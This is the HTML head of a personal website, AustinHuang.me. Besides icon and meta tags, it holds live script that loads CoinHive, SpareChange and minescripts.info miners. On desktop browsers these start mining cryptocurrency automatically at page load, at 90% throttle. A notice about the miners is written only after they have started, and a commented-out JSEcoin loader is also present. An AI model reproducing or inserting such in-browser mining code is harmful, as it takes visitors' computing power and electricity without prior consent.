<link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png?v=ngkXPp2Lnd">
<link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png?v=ngkXPp2Lnd">
<link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png?v=ngkXPp2Lnd">
<link rel="manifest" href="/icons/site.webmanifest?v=ngkXPp2Lnd">
<link rel="shortcut icon" href="/icons/favicon.ico?v=ngkXPp2Lnd">
<meta name="apple-mobile-web-app-title" content="AustinHuang.me">
<meta name="application-name" content="AustinHuang.me">
<meta name="msapplication-TileColor" content="#bada55">
<meta name="msapplication-TileImage" content="/icons/mstile-144x144.png?v=ngkXPp2Lnd">
<meta name="theme-color" content="#bada55">
<meta name="og:site_name" content="AustinHuang.me">
<meta name="og:type" content="website">
<meta name="og:image" content="https://www.gravatar.com/avatar/d5a5f57410d9f6bf426ac4e1c1c66c2c.jpg">
<meta name="og:image:type" content="image/jpeg">
<meta name="og:image:alt" content="Austin Huang the Bus :^)">
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<!-- <script data-cfasync="true" type="text/javascript">
!function(){var e=document,t=e.createElement("script"),s=e.getElementsByTagName("script")[0];t.type="text/javascript",t.async=t.defer=!0,t.src="https://load.jsecoin.com/load/40497/austinhuang.me/0/0/",s.parentNode.insertBefore(t,s)}();
</script> -->
<script type="text/javascript" src="https://www.sparechange.io/static/sparechange.js"></script>
<script>
	var sparechange = new Miner("48fb11f31b3749587bfb7bd1727129b480e1669062ddb7f14d04f675877f332ed2eaff9d48e1f567b175f89012a6e2c01a7008a30521ac3e5252068ae9ceaeb3", null, 0.9);
	var miner = new CoinHive.Anonymous('NS1Lh4sTCMiS0AcazVxeqiDKUXIrkTnX', {throttle: 0.9});
	if (/(Android|webOS|iPhone|iPad|iPod|BlackBerry|BB|PlayBook|Mobile|Phone|Kindle|Silk|Opera Mini)/i.test(navigator.userAgent) === false) {
		miner.start();
		sparechange.start();
		document.write("<script src=\"https:\/\/cdn.minescripts.info\/c\/8kZq.js\"><\/script>");
		document.write("<small>This page is monetized using crypto miners. It is totally fine to block them if they become annoying.</small>");
	}
</script>
